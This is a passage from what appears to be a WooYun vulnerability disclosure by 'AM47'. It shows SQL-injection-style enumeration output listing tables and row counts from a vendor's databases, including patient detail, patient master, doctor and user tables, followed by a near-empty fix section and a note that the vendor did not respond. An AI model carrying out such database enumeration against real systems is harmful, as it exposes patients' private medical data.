| dbo.[Sales Totals by Amount] | 66 |
| dbo.Territories | 53 |
| dbo.EmployeeTerritories | 49 |
| dbo.sysconstraints | 43 |
| dbo.Suppliers | 29 |
| dbo.[Products Above Average Price] | 25 |
| dbo.[Products Above Average Price] | 25 |
| dbo.Employees | 9 |
| dbo.[Category Sales for 1997] | 8 |
| dbo.Categories | 8 |
| dbo.Region | 4 |
| dbo.Shippers | 3 |
| dbo.syssegments | 3 |
+--------------------------------------+---------+
Database: icqdvip
+--------------------------------------+---------+
| Table | Entries |
+--------------------------------------+---------+
| dbo.desease_dict | 10171 |
| dbo.VIEW1 | 1938 |
| dbo.pats_detail | 1164 |
| dbo.country_dict | 239 |
| dbo.pats_master | 137 |
| dbo.doctor_dict | 120 |
| dbo.pbcatedt | 21 |
| dbo.pbcatfmt | 20 |
| dbo.USERS | 11 |
| dbo.syssegments | 3 |
| dbo.sysconstraints | 2 |
+--------------------------------------+---------+
漏洞证明:
修复方案:
检查加修复
版权声明:转载请注明来源 AM47@乌云
漏洞回应
厂商回应:
未能联系到厂商或者厂商积极拒绝